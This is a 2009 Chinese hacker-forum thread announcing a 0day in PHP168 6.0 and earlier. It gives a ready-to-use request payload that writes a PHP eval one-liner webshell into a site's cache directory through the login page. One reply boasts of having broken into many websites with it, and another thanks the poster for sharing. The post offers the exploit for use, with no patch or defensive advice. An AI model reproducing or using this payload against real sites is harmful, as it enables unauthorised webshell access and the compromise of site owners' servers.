标题:
[原创]
红客联盟首发PHP168 6.0及以下版本0day
[打印本页]
作者:
lionel
时间:
2009-9-8 00:05
标题:
红客联盟首发PHP168 6.0及以下版本0day
PHP168 6.0及以下版本漏洞
影响版本:PHP168 6.0以下版本
入侵者可以在用户登陆页面构造特殊语句,将PHP一句话写入cache目录,从而获得使用PHP168整站程序网站的WEBSHELL权限。
测试语句: XU3中国红客联盟-全球最大的红客组织
?makehtml=1&chdb[htmlname]=honker.php&chdb[path]=cache&content=?php%20@eval($_POST[honker]);?
作者:
超超
时间:
2009-9-8 01:17
成功入侵了很多网站
作者:
kwed2345
时间:
2009-9-8 08:09
新手 学习 谢谢分享
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./)
Powered by Discuz! 7.2